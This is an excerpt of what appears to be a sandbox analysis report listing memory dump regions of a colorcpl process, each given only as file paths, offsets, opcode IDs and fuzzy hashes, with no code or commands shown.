                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 023a16602a0576ff8963c37d86d4906b769d21f2eadeff563b1c96832e07d2cc
                                                                                                                                          • Instruction ID: 2467e7afb528293351fd92bbdabcbd0a04dc46888395846e67e50ec000051f69
                                                                                                                                          • Opcode Fuzzy Hash: 023a16602a0576ff8963c37d86d4906b769d21f2eadeff563b1c96832e07d2cc
                                                                                                                                          • Instruction Fuzzy Hash: 6B310E31F083459FC710DFA8C990B6EB7F9AB84308F40853AD652E7291EB34D941EB91
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                          • Instruction ID: 208e53792c21452c2ad430e86c481465a4d1f451bf4d6a3511e17fb7b8336861
                                                                                                                                          • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                          • Instruction Fuzzy Hash: 69210636E0A35AAADB01CFB58801BAFB7B5AF55740F018175AE14FB240E234CD00C7E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                          • Instruction ID: 5710959399f8f94373eea6d2b7b83aa23db362dfe32783642892d892c5cfd630
                                                                                                                                          • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                          • Instruction Fuzzy Hash: 2D212B37604751A7CB169BE58804BBABF75EF80714F40841EFAA58B691E734E950C7A0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f9af619e4c8d36fc8575bd082748007bd22526d7c8e02b9bc809ab0b1574f41c
                                                                                                                                          • Instruction ID: 4f5a0075546513c7c40c1ff0f94b2ef54390c1afb9721d34dce91521416ce46d
                                                                                                                                          • Opcode Fuzzy Hash: f9af619e4c8d36fc8575bd082748007bd22526d7c8e02b9bc809ab0b1574f41c
                                                                                                                                          • Instruction Fuzzy Hash: 19314DB25083108BCB129F14CC55BA977B4EF50318F5485A9ED859B3C7EB74DD81CBA0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8a9468c026b7a939db848ef85b43312647ec4d098846096a3956be8adac05047
• Instruction ID: 265e49e61bafaeea6f85b44978a9f2c89204156d74987a121ac6ac77bdc709f7
• Opcode Fuzzy Hash: 8a9468c026b7a939db848ef85b43312647ec4d098846096a3956be8adac05047
• Instruction Fuzzy Hash: F331D431A4572C9BDB22CF14CD42FEE77B9AF19750F4101A1FA55AB290D6B49E80CFA0

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7e161296b9e30aeaad57ea91ae8a9e827962af8a7565ec20dd2ce4c5a73f532a
• Instruction ID: 801e3adb38e862f2b8a0e9215f5d2bf4cc834eae826f236c07d58c9a3f70e988
• Opcode Fuzzy Hash: 7e161296b9e30aeaad57ea91ae8a9e827962af8a7565ec20dd2ce4c5a73f532a
• Instruction Fuzzy Hash: 9F219172A097659BC712CF18C990F5BB7E5FF88760F014629FD54AB281D730EA11CBA2

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
• Instruction ID: cf8fb0bc83c0afefaa1cfb4b281bfca7462a147fb904faae3ab60e9fa1766a01
• Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
• Instruction Fuzzy Hash: A1217F75A04708EFCB11CF59C990A8ABBF5FF48714F508079EE25AF241D671DA15CB90

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
• Instruction ID: 437d380737d90b00b78f41ddfff6d8a6d99e296493d24ff0a00544df9d0af27e
• Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
• Instruction Fuzzy Hash: 61318731608708AFDB12CB68C984F6AB7F8EF89354F1045A9E951DB281E770EA02CB50

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8b67301cfc716f66f7014d6add87ccb0d33d19959bf5f1d3b1b97ad91cf2560d
• Instruction ID: e2b638e0044d51a8b643e24c6d9ef93d4c0397ace952e7ad653d075ff6d800a2
• Opcode Fuzzy Hash: 8b67301cfc716f66f7014d6add87ccb0d33d19959bf5f1d3b1b97ad91cf2560d
• Instruction Fuzzy Hash: 5C318E75A04315DFCB04CF18DA80EAEB7B9FF88304F11455AE9599B392E771EA50CB90

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f40cc40e52f1a1be93e21f3f0902927ccfcabfab6ac92150de4c6beed4dce52b
• Instruction ID: 34db3e03f22c1ee490efbc1e9dee5f09cad715ccb225b94f9e4d72cf403a23a1
• Opcode Fuzzy Hash: f40cc40e52f1a1be93e21f3f0902927ccfcabfab6ac92150de4c6beed4dce52b
• Instruction Fuzzy Hash: D1218B75A003299BCF15CF59C891ABEB7F8FF48754F500569E941EB290D738AD41CBA0

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3b1d5833f3260d9cab512b81c13d3242cd85cd23056483d33448eb793d579e23
• Instruction ID: 45c35ec3c64822b75d5b1cab3e2ea1f8a5976421a6f2ce7d6d1bc67f5ac68792
• Opcode Fuzzy Hash: 3b1d5833f3260d9cab512b81c13d3242cd85cd23056483d33448eb793d579e23
• Instruction Fuzzy Hash: C121BA71604704AFC712CB68C984F6AB7B8FF8C754F100569F904DB6A1D638ED40CBA8

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3bdb80d1298dcb3a4887749e568e8423405fef63ae4b353bdb711871b11eb0eb
• Instruction ID: c15678a6ff620dd38fe340cbd916cc9ef9b8ee98fdce8761a3db2ef5e731a5c1
• Opcode Fuzzy Hash: 3bdb80d1298dcb3a4887749e568e8423405fef63ae4b353bdb711871b11eb0eb
• Instruction Fuzzy Hash: 7321007290C3459FC712CF59D958F6BBBECAF98364F040A6ABD80CB291D734D904C6A2

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 39cff5425178fc9a90fade3391f582a4267f799a94bef54447d34304cc0f8fe2
• Instruction ID: 7bcbdf0b680113f03e6b3415226108acc35f84bafe1bbd9da59c4bb11a5242a9
• Opcode Fuzzy Hash: 39cff5425178fc9a90fade3391f582a4267f799a94bef54447d34304cc0f8fe2
• Instruction Fuzzy Hash: 1521F931A0D7859BE31357698E48F1877E8AF91774F150360EA20EF6D6EFACC851C251

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 94ab46578d20408bea956c1d0ef65dd338a4ce08999eb16d1d9100040ce22868
• Instruction ID: 2b78d2ebe4685a6dff66c0832cca9bcb761a6144cd2f9ba6a895622d057cb358
• Opcode Fuzzy Hash: 94ab46578d20408bea956c1d0ef65dd338a4ce08999eb16d1d9100040ce22868
• Instruction Fuzzy Hash: BC21A979201B509FC726CF28C940B46B3F5AF48708F248968A959CB7A2E735E846CF94

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 58053368b97729598b66afd4940b07575a22c4311bf740d192606c3fba1dad57
• Instruction ID: 71e110ff327fb99d4d4e578b2febe92b9e98e4b071a38f2f98d02ee3464ea4b1
• Opcode Fuzzy Hash: 58053368b97729598b66afd4940b07575a22c4311bf740d192606c3fba1dad57
• Instruction Fuzzy Hash: 8E113A33388B217FE72346588C44F2B7A99EBD4720F600124FB19DB280DB68DC008696

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e7fb4df735394ada1b77effedff562111bea0ad8040de43ad3719a4cae8590ea
• Instruction ID: bb635f35fc6c1317e3e5572a6d6d1ce6bd2f5a1ce9bff268604ca0f8531a2b0a
• Opcode Fuzzy Hash: e7fb4df735394ada1b77effedff562111bea0ad8040de43ad3719a4cae8590ea
• Instruction Fuzzy Hash: 292107B1E04308ABCB14CFAAD994AAEFBF8BF98710F10062AE405A7254D6749945CB54

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
• Instruction ID: f09c1d07316c7a3a95af96261cc30aca70ae7e8aa28c63ff65e78a173509f3c0
• Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
• Instruction Fuzzy Hash: 07216772A04309AFDB128F98CC44B9EBBBAEF88310F640859F910A7251E734DA50DB50

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
• Instruction ID: 865386b4cf911361b0bf0ed2b2b61e1026e020cedeece9a2058c1f0b683d62d2
• Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
• Instruction Fuzzy Hash: 4311BF72609705AFD7228F54CD85FAEBBB8EB88754F100029EE049B190E671EE54DB61

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8650e1c09aed452b81d2f978bf2fdda5237de3b08e4cfa615cb03aef1eb6d87f
• Instruction ID: 57fc66270ed8ad80d9fe3c648d36ed71c78eb1f41390064c939416831619d0d9
• Opcode Fuzzy Hash: 8650e1c09aed452b81d2f978bf2fdda5237de3b08e4cfa615cb03aef1eb6d87f
• Instruction Fuzzy Hash: 60110435705B62DBCB01CF89C6C0A16B7E9EF5A714B94426AEE089F305D6B3D901CBA0

Memory Dump Source
• Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
• Instruction ID: 9d50b79261b36b5f07e43c261c9da4b3c135036c7579e4770c4ede4edb70a1bb
• Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
• Instruction Fuzzy Hash: B0219D72A48B40DFC725CF49D644E56F7E6EB98B10F10817DE9499BA10E738ED15CB80
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: bfce842932187bf9a777103f69fa814ecd9b838e36a8cc4e64177707bd500407
                                                                                                                                          • Instruction ID: 05c0631f0341f1b191a85760e2ea469a572a840774182472d8f5babe4cfc9ac9
                                                                                                                                          • Opcode Fuzzy Hash: bfce842932187bf9a777103f69fa814ecd9b838e36a8cc4e64177707bd500407
                                                                                                                                          • Instruction Fuzzy Hash: 9B218E31A44615DFCB04CF58C580A6EBBB6FB88318F60426DD104AB391C772AE06CBA0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e48b8f39ff1dddd144cb8a18e2a99d4638fcc4bb6be2c7e63893ebb6cb4519c0
                                                                                                                                          • Instruction ID: b82880b26aa04bfefb8d02f74229039da2f1bde474631f67741dd708892c16e7
                                                                                                                                          • Opcode Fuzzy Hash: e48b8f39ff1dddd144cb8a18e2a99d4638fcc4bb6be2c7e63893ebb6cb4519c0
                                                                                                                                          • Instruction Fuzzy Hash: E3216D75508B01EFC7218F68C881F66B3E8FB44750F40882DE99AD7651DA70E950CBA0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f503e30531bff184179f27aee31345971eaa75c109cd624493dd2d11973c7d6a
                                                                                                                                          • Instruction ID: a212e06e8a62e478f5019c9446a82a422f805d71a31edf73721334c39c125d36
                                                                                                                                          • Opcode Fuzzy Hash: f503e30531bff184179f27aee31345971eaa75c109cd624493dd2d11973c7d6a
                                                                                                                                          • Instruction Fuzzy Hash: 5D11CE32244704EBD722DB59C980F4A77A8EF99B64F014029F315DB251DA74E900CBA0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d99da51077a1efad479957b077a27df958b98e608212bae7173bad552934103d
                                                                                                                                          • Instruction ID: 7b5258abc28ada07b829c9c2bb1287997e3c9df2e8fa2370ad8ad1d053b73af7
                                                                                                                                          • Opcode Fuzzy Hash: d99da51077a1efad479957b077a27df958b98e608212bae7173bad552934103d
                                                                                                                                          • Instruction Fuzzy Hash: C6114837609310DBCB0ACB25CD84A5B7266DFD1374B654A28E922DB2C1DD30DD02C292
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 93bcf1e185ff5998459061fa894fe805b73b899de5841f111f916799efa38cf9
                                                                                                                                          • Instruction ID: 45509037731ea9d57eecb6b29334d32cf488ecfc5df53705c06db632ad5e9074
                                                                                                                                          • Opcode Fuzzy Hash: 93bcf1e185ff5998459061fa894fe805b73b899de5841f111f916799efa38cf9
                                                                                                                                          • Instruction Fuzzy Hash: CC11CE76A09356DFCB16CF59CA80E4AFBE9EF94710B018979DD05AB351D634DE00CB90
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                          • Instruction ID: 11379a11336f541b2ab2365f98ab582829b7e752b13f719d4e48e6d4122d58e1
                                                                                                                                          • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                          • Instruction Fuzzy Hash: 6A21F4B5A40B059FD3A0CF29C580B52BBF4FB48B10F104A2EE98AC7B40E371E814CB90
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                          • Instruction ID: 1784e9910fac2a7008afe1a0cab1dd931cc525533bb5c364d34e34edf46d67f6
                                                                                                                                          • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                          • Instruction Fuzzy Hash: E4110433A04A09AFCB1ACB64C805F9DB7F5EF94310F058269E84AA7350E675AD01CBD0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                          • Instruction ID: 502a0628f47ad679e7b559fc0753c6bfa0ac884adb2571d02d4b5f7568444e05
                                                                                                                                          • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                          • Instruction Fuzzy Hash: 3A11C231608700EFD7218F44CD56F4A77E5EF55768F119638EA88AB260DB31DD40DBA0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b0bb2dd329d155168fa967f1cd5d65dcd2c98ce9873087c4118af38d1de909c7
                                                                                                                                          • Instruction ID: 4a1cf92d17099b9c710a1f8619e00614fe4399e6c65aa38b91c973ec9c21de84
                                                                                                                                          • Opcode Fuzzy Hash: b0bb2dd329d155168fa967f1cd5d65dcd2c98ce9873087c4118af38d1de909c7
                                                                                                                                          • Instruction Fuzzy Hash: FD01D631B0D784ABE313926AD989F1B7B9CEF90394F450075FA00DB251ED68DC10D2B2
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 64a049e9da593c673940d548b6764dbe55f0109838c795274b6db8b343771101
                                                                                                                                          • Instruction ID: 9632ac5d1d73d1588bbf674751cb5450f664cd8e90622432bb1df213c0f70837
                                                                                                                                          • Opcode Fuzzy Hash: 64a049e9da593c673940d548b6764dbe55f0109838c795274b6db8b343771101
                                                                                                                                          • Instruction Fuzzy Hash: 1D11C236209B45AFDB11CF55C994F467BB8EB857A8F004635F9289B750C730E800CF60
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cf8dade58e7625e9a48c2e619f73c3ff514f31dc44a03db5e31454ce353b211d
                                                                                                                                          • Instruction ID: 9e2a48d451bd0491d9563304f3c597aa013653f1db3898146aaaa99bd8b531bb
                                                                                                                                          • Opcode Fuzzy Hash: cf8dade58e7625e9a48c2e619f73c3ff514f31dc44a03db5e31454ce353b211d
                                                                                                                                          • Instruction Fuzzy Hash: DD11C23A20C7109FD7228A29D954F56B7A6FFC4710F15453AEB86C7791DA34E902CB90
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 294484e1279584e190c4e07203df87e9ccf623689ce6d37cbad80b78c9523cd9
                                                                                                                                          • Instruction ID: c3b4e261404ad976469a3eef35792432bd905c1b30b805399e0238e4ca79a4dd
                                                                                                                                          • Opcode Fuzzy Hash: 294484e1279584e190c4e07203df87e9ccf623689ce6d37cbad80b78c9523cd9
                                                                                                                                          • Instruction Fuzzy Hash: 9411CE72A01714EBCB22CF58CA80B5EF7F8EF88744F510498EE01A7241DB34ED518BA0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 3300c1c23743264898e738f835f62d69a943fab19c899380c249d0637d5b7393
                                                                                                                                          • Instruction ID: 201b50de3841f4cb582869d2e7d2f9fc05c76b00a181e0d2506d9ee31e2c853d
                                                                                                                                          • Opcode Fuzzy Hash: 3300c1c23743264898e738f835f62d69a943fab19c899380c249d0637d5b7393
                                                                                                                                          • Instruction Fuzzy Hash: CA115B75A0530CABCF16DFA4C854EAE7BB5FB48354F004159BD0197384DA35D911CB90
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d3e7cc08cc5f93ba6937c31b3bff24975e3a21dce4ad5de441645dc7a47dc4ab
                                                                                                                                          • Instruction ID: a8e7cd714f0903be18f34ad2e51e576615df41461bd0b6ca4217fc58ccbf739a
                                                                                                                                          • Opcode Fuzzy Hash: d3e7cc08cc5f93ba6937c31b3bff24975e3a21dce4ad5de441645dc7a47dc4ab
                                                                                                                                          • Instruction Fuzzy Hash: 41118BB16183089FC300CF69C44596BBBF4EF99750F008A1EF958D73A0E630E900CBA6
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                                          • Instruction ID: 5ce60eae87e28306c807837d5fbeab6f6f1b2e18876050de2a6ed56d9f1b82df
